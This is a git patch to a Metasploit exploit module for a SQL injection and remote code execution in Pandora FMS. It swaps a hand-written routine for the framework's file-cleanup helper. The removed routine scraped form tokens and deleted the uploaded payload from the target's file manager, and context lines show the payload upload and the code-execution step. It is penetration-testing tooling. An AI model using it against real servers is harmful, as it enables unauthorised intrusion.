From 4bbadc44d6e998f0de090541d9c7d91415fadf96 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 25 Nov 2014 22:00:42 -0600
Subject: [PATCH] Use Msf::Exploit::FileDropper

---
 .../exploits/linux/http/pandora_fms_sqli.rb   | 77 +------------------
 1 file changed, 1 insertion(+), 76 deletions(-)

diff --git a/modules/exploits/linux/http/pandora_fms_sqli.rb b/modules/exploits/linux/http/pandora_fms_sqli.rb
index 11d7293cc6..f36b51db27 100644
--- a/modules/exploits/linux/http/pandora_fms_sqli.rb
+++ b/modules/exploits/linux/http/pandora_fms_sqli.rb
@@ -281,6 +281,7 @@ class Metasploit3 < Msf::Exploit::Remote
     })
 
     if res && res.code == 200 && res.body.include?("Upload correct")
+      register_file_for_cleanup(@payload_name)
       print_status("#{peer} - Successfully uploaded payload")
     else
       fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
@@ -310,80 +311,4 @@ class Metasploit3 < Msf::Exploit::Remote
       fail_with(Failure::Unknown, "#{peer} - Unable to perform remote code execution!")
     end
   end
-
-
-  def cleanup
-    super
-    return if @rce_failed
-
-    print_status("#{peer} - Cleaning script remnants")
-
-    # Extract hash and hash2 from response
-    res = send_request_cgi({
-      'method' => 'GET',
-      'cookie' => @cookie,
-      'uri'    => normalize_uri(uri, 'index.php'),
-      'vars_get' => {
-        'sec' => 'gsetup',
-        'sec2' => 'godmode/setup/file_manager'
-      }
-    })
-
-    if res && res.code == 200 && res.body =~ /(?<=#{@payload_name}<)(.*)(?=<\/tr>)/m
-      form = $1
-
-      # Extract hash
-      if form =~ /(?<=name="hash" type="hidden"  value=")(.*?)(?=" \/>)/
-        hash = $1
-      else
-        print_error("#{peer} - Could not extract hash from response!")
-        print_error("#{peer} - Upload will fail!")
-        return false
-      end
-
-      # Extract hash2
-      if form =~ /(?<=name="hash2" type="hidden"  value=")(.*?)(?=" \/>)/
-        hash2 = $1
-      else
-        print_error("#{peer} - Could not extract hash2 from response!")
-        print_error("#{peer} - Upload will fail!")
-        return false
-      end
-
-      # Extract real_directory
-      if form =~ /(?<=filename" type="hidden"  value=")(.*?)(?=" \/>)/
-        filepath = $1
-      else
-        print_error("#{peer} - Could not extract real_directory from response!  Falling back to default.")
-        filepath = '/var/www/html/pandora_console/images/'
-      end
-
-
-    else
-      print_error("#{peer} - Could not identify file manager form!")
-    end
-
-    res = send_request_cgi({
-      'method' => 'POST',
-      'cookie' => @cookie,
-      'uri'    => normalize_uri(uri, "index.php"),
-      'vars_get' => {
-        'sec' => 'gsetup',
-        'sec2' => 'godmode/setup/file_manager'
-      },
-      'vars_post' => {
-        'filename' => filepath,
-        'hash' => hash,
-        'hash2' => hash2,
-        'directory' => 'images',
-        'delete_file' => 1
-      }
-    })
-
-    if res && res.code == 200 && res.body.include?('Success')
-      print_status("#{peer} - Script removed successfully")
-    else
-      print_warning("#{peer} - Failed to remove #{@payload_name}")
-    end
-  end
 end